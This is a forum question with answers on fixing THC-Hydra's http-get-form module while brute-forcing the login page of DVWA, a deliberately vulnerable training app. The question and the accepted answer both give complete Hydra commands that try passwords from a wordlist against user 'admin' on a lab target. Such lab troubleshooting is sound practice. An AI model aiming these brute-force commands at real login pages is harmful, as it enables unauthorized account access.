# How to use http-get-form in THC-Hydra?

Tags: http, attacks, brute-force, dvwa

I've been messing with Hydra (Brute Force) to solve the "Damn Vulnerable Web App"
brute force section but the problem is when I use `http-get-form` it said:

```
Warning: child 1 seems to have died, restarting (this only happens if a module is bad)
```

And the brute force command is:

```
hydra 192.168.100.15 http-get-form \
      "/dvwa/vulnerabilities/brute/#:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect" \
      -l admin -P /root/Desktop/wordlists/test.txt -w 30
```

I can't find out why the module is bad.

Comment: have you tried dropping the "#" from your URL? DVWA doesn't need it.

Comment: Yes I did and replaced it with "index.php" but still the same issue

Answer (score 5):

```
hydra -l admin -P /root/Desktop/wordlists/test.txt dvwa http-get-form "/dvwa/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect."
```

Comment: that targets a different page on the dvwa site

Comment: Yes I did and it's working fine but I wanna know how can you do this command to sub directory such as:  /dvwa/vulnerabilities/brute

Comment: @AmA I have edited my answer, have you tried it?